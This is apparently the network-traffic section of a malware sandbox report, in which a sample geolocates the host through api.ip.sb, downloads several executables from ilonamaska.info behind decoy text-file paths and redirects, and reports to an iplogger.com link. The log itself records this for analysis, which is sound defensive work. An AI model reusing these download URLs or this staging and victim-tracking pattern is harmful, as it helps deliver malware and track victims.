Network Analysis

GET /ip HTTP/1.1 Host: api.ip.sb Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 19 May 2023 09:02:20 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding Cache-Control: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G0%2BlM7R%2FC1FVeTUESnjis3zLq9jS3h9MNAp59euV0pRfbMXH19%2BuydbAAScnTcts4rZO9%2F7g2wKaE5Jsiyp30l%2F8NRrl3xGj3xZ7KJqNpOvqNrXywlbF2dbl2Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 7c9b290fdea38328-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

GET /geoip HTTP/1.1 User-Agent: CustomInstaller 1.0/3 Host: api.ip.sb Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 19 May 2023 09:02:27 GMT Content-Type: application/json; charset=utf-8 Content-Length: 352 Connection: keep-alive vary: Accept-Encoding vary: Accept-Encoding Cache-Control: no-cache access-control-allow-origin: * CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F%2B4tGp3W3zVViomXDf6E65gsPZlJ6YDHexO8%2BxpuBlpjEGXjjJPKFmYaIt7pqrp%2BQrfZCKLbnqn5Dhu22acJErIHS7AOpWZuGes2mI5u3qyjBQBw8BJQ2oafBQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 7c9b29368eae8d1e-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

GET /geoip HTTP/1.1 User-Agent: CustomInstaller 1.0/3 Host: api.ip.sb Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 19 May 2023 09:02:35 GMT Content-Type: application/json; charset=utf-8 Content-Length: 352 Connection: keep-alive vary: Accept-Encoding vary: Accept-Encoding Cache-Control: no-cache access-control-allow-origin: * CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ai%2FpBvgL7qjtqk9lgCchBzlhEseDgmM1Dv4TgA%2F4qjeswV06nUoaeNDhlgMo%2BKr%2BZ4MRvhds0Lo89byPNf3ispCxArgoHF3L9uO00ZgyeJrk2Oy8B7LH5JLP7Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 7c9b296879d18d1e-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

GET /geoip HTTP/1.1 User-Agent: CustomInstaller 1.0/3 Host: api.ip.sb Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 19 May 2023 09:02:42 GMT Content-Type: application/json; charset=utf-8 Content-Length: 352 Connection: keep-alive vary: Accept-Encoding vary: Accept-Encoding Cache-Control: no-cache access-control-allow-origin: * CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z1azgPGGGK1KbJj1F9qWO6K0PrlSwwAYQOtrjeHh0ae6RNSmzExvQLyPzSCnSm2f9WQsBrjzShcmj1Wk1rplrdxvxGykZ2a9ZB89xT2lsahX1MZhlUrnPHDwbg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 7c9b2998ef448d1e-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

GET /wp-content/uploads/2021/10 HTTP/1.1 User-Agent: Installed OK 1.0/3 Host: ilonamaska.info

HTTP/1.1 301 Moved Permanently Server: nginx/1.14.0 (Ubuntu) Date: Fri, 19 May 2023 09:02:12 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 267 Location: http://ilonamaska.info/function/v2tmp/useruploadetfilesun.php Connection: keep-alive

GET /function/v2tmp/useruploadetfilesun.php HTTP/1.1 User-Agent: Installed OK 1.0/3 Host: ilonamaska.info Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 19 May 2023 09:02:13 GMT Content-Type: application/octet-stream Content-Length: 1850880 Connection: keep-alive Content-Disposition: attachment; filename=file.exe

GET /books/userpaths/birbik/harrypotter1.txt HTTP/1.1 User-Agent: The Bigger Than Bigger Bim Bim Talk Told You Than i 348 Host: ilonamaska.info

HTTP/1.1 301 Moved Permanently Server: nginx/1.14.0 (Ubuntu) Date: Fri, 19 May 2023 09:02:27 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 256 Location: http://ilonamaska.info/app/files/ap/id27315001.php Connection: keep-alive

GET /app/files/ap/id27315001.php HTTP/1.1 User-Agent: The Bigger Than Bigger Bim Bim Talk Told You Than i 348 Host: ilonamaska.info Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 19 May 2023 09:02:27 GMT Content-Type: application/octet-stream Content-Length: 434176 Connection: keep-alive Content-Disposition: attachment; filename=compan.exe

GET /books/userpaths/birbik/harrypotter111.txt HTTP/1.1 User-Agent: The Bigger Than Bigger Bim Bim Talk Told You Than i 348 Host: ilonamaska.info

HTTP/1.1 301 Moved Permanently Server: nginx/1.14.0 (Ubuntu) Date: Fri, 19 May 2023 09:02:31 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 257 Location: http://ilonamaska.info/app/files/ap/id273150012.php Connection: keep-alive

GET /app/files/ap/id273150012.php HTTP/1.1 User-Agent: The Bigger Than Bigger Bim Bim Talk Told You Than i 348 Host: ilonamaska.info Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 19 May 2023 09:02:31 GMT Content-Type: application/octet-stream Content-Length: 434176 Connection: keep-alive Content-Disposition: attachment; filename=compan.exe

GET /books/userpaths/birbik/harrypotter1.txt HTTP/1.1 User-Agent: The Bigger Than Bigger Bim Bim Talk Told You Than i 348 Host: ilonamaska.info

HTTP/1.1 301 Moved Permanently Server: nginx/1.14.0 (Ubuntu) Date: Fri, 19 May 2023 09:02:35 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 256 Location: http://ilonamaska.info/app/files/ap/id27315001.php Connection: keep-alive

GET /app/files/ap/id27315001.php HTTP/1.1 User-Agent: The Bigger Than Bigger Bim Bim Talk Told You Than i 348 Host: ilonamaska.info Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 19 May 2023 09:02:35 GMT Content-Type: application/octet-stream Content-Length: 434176 Connection: keep-alive Content-Disposition: attachment; filename=compan.exe

GET /books/userpaths/birbik/harrypotter111.txt HTTP/1.1 User-Agent: The Bigger Than Bigger Bim Bim Talk Told You Than i 348 Host: ilonamaska.info

HTTP/1.1 301 Moved Permanently Server: nginx/1.14.0 (Ubuntu) Date: Fri, 19 May 2023 09:02:38 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 257 Location: http://ilonamaska.info/app/files/ap/id273150012.php Connection: keep-alive

GET /app/files/ap/id273150012.php HTTP/1.1 User-Agent: The Bigger Than Bigger Bim Bim Talk Told You Than i 348 Host: ilonamaska.info Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 19 May 2023 09:02:39 GMT Content-Type: application/octet-stream Content-Length: 434176 Connection: keep-alive Content-Disposition: attachment; filename=compan.exe

GET /stat_os.php HTTP/1.1 User-Agent: Installed OK 5.0/1 Host: ilonamaska.info

HTTP/1.1 302 Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 19 May 2023 09:02:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive location: https://iplogger.com/1wkFq5

GET /wp-content/uploads/2022/08 HTTP/1.1 User-Agent: Prepaid User 348920939423 Host: ilonamaska.info

HTTP/1.1 301 Moved Permanently Server: nginx/1.14.0 (Ubuntu) Date: Fri, 19 May 2023 09:02:47 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 256 Location: http://ilonamaska.info/function/v2tmp/path_int.php Connection: keep-alive

GET /function/v2tmp/path_int.php HTTP/1.1 User-Agent: Prepaid User 348920939423 Host: ilonamaska.info Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 19 May 2023 09:02:48 GMT Content-Type: application/octet-stream Content-Length: 1383424 Connection: keep-alive Content-Disposition: attachment; filename=locallink.exe